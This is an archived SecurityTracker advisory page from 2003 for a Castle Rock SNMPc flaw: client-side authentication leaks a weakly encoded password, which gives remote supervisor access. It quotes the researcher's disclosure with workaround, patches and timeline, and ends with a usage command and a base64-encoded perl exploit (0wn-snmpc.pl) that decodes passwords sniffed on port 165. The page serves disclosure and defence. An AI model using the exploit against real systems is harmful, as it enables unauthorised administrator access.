SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   SNMPc Vendors:   Castle Rock Computing
Castle Rock SNMPc Yields Supervisor Privileges to Remote Users
SecurityTracker Alert ID:  1007585
SecurityTracker URL:  http://securitytracker.com/id/1007585
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 27 2003
Impact:   Disclosure of authentication information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 6.0.8 and prior versions
Description:   A vulnerability was reported in Castle Rock Computing's SNMPc. A remote user can gain supervisor access to the network management system.

It is reported that server authentication is performed on the client. It is also reported that during the authentication process, the server supplies an encoded version of the user's password to the client. The password can be readily decoded, the report said.

Because the system includes an 'Administrator' account by default that has Supervisor privileges, a remote user can login with Supervisor privileges.

The following notification timeline is provided [quoted]:

2003-08-11 - We notified Castle Rock Computing helpdesk about vulnerability in version 6.x.
2003-08-14 - Castle Rock Computing created a fix.
Impact:   A remote user can gain administrator access (which has Supervisor privileges).

A remote user can also determine the password for a given username.
Solution:   The vendor has released a fix for version 6.0, available at:

http://www.castlerock.com/download/fix821_608.zip (vers 6.0.8)
http://www.castlerock.com/download/fix821_605.zip (vers 6.0.5)

According to the report, you should stop snmpc and unzip the appropriate patch file into the snmpc server install directory.

For version 5.1, a full release is available at:

http://www.castlerock.com/download/snmpc519.exe
Vendor URL:  www.castlerock.com/products/snmpc/default.php (Links to External Site)
Cause:   Access control error, Authentication error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Mon, 25 Aug 2003 13:34:33 +0400 (MSD)
Subject:  SNMPc v5 and v6 remote vulnerability


--8323328-1986361362-1061571513=:1453
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.44.0308222102501.1453@snark.multimedia.ru>


Topic:			SNMPc v5 and v6 remote vulnerability
Impact: 		Any remote user can gain Supervisor access to NMS
Versions affected:	All versions up to and including 6.0.8
Fix:			available 
Remote: 		yes
Exploit:		available

I.   Description

 SNMPc is a general-purpose Distributed Network Manager by Castle Rock
Computing that suitable as a cost-effective solution for small and
middle-range networks. Due to weak authentication protocol any remote user can gain Supervisor access to SNMPc server.

II.  Detailed Description
 
As for SNMPc is distributed system it consists of several components. Server components execute at a centralized computer and maintain
 centralized databases, including configuration, map topology, event log files and user information. User must start a remote login
 Console or JAVA console to view and control the SNMPc system. Authentication scheme used by remote console is rather simple  - all
 authentication is done at the client side. 

During login phase, after some initial exchange (probably version negotiation) remote console sends username to server. Server replies
 with block of user's data - username, real name, phone number, user's group etc. exactly as it is stored in internal database in
 file ntuserdb.dat. This also includes user's password "encrypted" with some variation of simple substitution. Thus actual password
 of any known user can be easily revealed.

Fortunately to attacker there is default user Administrator, which can't be deleted. Administrator's Supervisor privileges can't be
 lowered.

III. Impact

As for snmp read/write community of network devices, network structure and other sensitive information can be stored in NMS database
 this can be serious security problem.

IV.  Workaround

Use packet filter in order to allow only trusted workstations connect to SNMPc server. SNMPc listens on udp ports 162,164 and tcp
 ports 165,166,167,168,12421. 
162/udp listens for generic snmp traps from network devices,
165/tcp used by remote login console, 12421 by JAVA console.
Given exploit needs only 165/tcp to work. 
JAVA version of console is not tested and also can be vulnerable.

V.   Solution  

Castle Rock Computing created a fix, which prevents active attacks.

The client should send the user information to the server and have the
server perform the login verification.

A fix for version 6.0 is posted at the following locations:

http://www.castlerock.com/download/fix821_608.zip (vers 6.0.8)
http://www.castlerock.com/download/fix821_605.zip (vers 6.0.5)

Stop snmpc and unzip the appropriate file into the snmpc server install
directory.

For version 5.1, a full release is available at:

http://www.castlerock.com/download/snmpc519.exe


VI. Vendor status.

2003-08-11 - We notified Castle Rock Computing helpdesk about vulnerability in version 6.x. 
2003-08-14 - Castle Rock Computing created a fix.


VII. Exploit
 Here is simple script that demonstrates this vulnerability. You need SNMPc remote login console, ethereal and some flavor of perl
 (say Cygwin) installed on your Windows workstation in order this exploit to work.
Run it as follows 
"C:\Program Files\Ethereal\tethereal.exe" -lnV port 165 | C:\cygwin\bin\perl.exe 0wn-snmpc.pl

Try to login to server as Administrator with empty password.
As for space is valid symbol in password this script will print 'decrypted' password limited by semicolons.










--8323328-1986361362-1061571513=:1453
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="0wn-snmpc.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.44.0308222058330.1453@snark.multimedia.ru>
Content-Description: 
Content-Disposition: ATTACHMENT; FILENAME="0wn-snmpc.pl"

IyEvdXNyL2Jpbi9wZXJsDQ0KJHN0cj0nLllaW1xdXl9QUVJTVFVWV0hJSktM
TU5PQEFCQ0RFRkd4eXp7fH1+LnBxcnN0dXZ3aGlqa2xtbm9gYWJjZGVmZy4u
Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uODk6Ozw9Pj8wMTIzNDU2
NygpKissLS4vICEiIyQlJlwnLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u
Li4uLi4uLi4uLi4nOw0NCg0NCg0NCndoaWxlKDw+KXsNDQogICRzPSIiOw0N
CiAgaWYoL14wMTMwIC8pew0NCiAgICBHRVRJVDogeyBkbyB7DQ0KICAgICAg
cy9eMDEzMCAgMDAgMDAgLy8gaWYgL14wMTMwLzsNDQogICAgICBzL15bWzp4
ZGlnaXQ6XV17NH0gIC8vOw0NCiAgICAgIHMvICAgLiokLy9tczsgICANDQog
ICAgICAkcz0kcy4iICIuJF87DQ0KICAgICAgbGFzdCBHRVRJVCBpZiAoJHMg
PX4gLyAwMC8pOw0NCiAgICB9d2hpbGUgKDw+KSAgfTsNDQogICAgJHM9fnMv
IDAwLiokLy9tczsNDQogICAgJHM9fnMvIChbWzp4ZGlnaXQ6XV17Mn0pIChb
Wzp4ZGlnaXQ6XV17Mn0pLyBzdWJzdHIoJHN0ciwoaGV4KCQxKSksMSkuc3Vi
c3RyKCRzdHIsKGhleCgkMikpLDEpIC9pZ2U7DQ0KICAgICRzPX5zLyAoW1s6
eGRpZ2l0Ol1dezJ9KS8gY2hyKGhleCgkMSkpIC9pZ2U7DQ0KICAgIHByaW50
ICI6JHM6XG4iOw0NCiAgfQ0NCn0NDQo=
--8323328-1986361362-1061571513=:1453--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC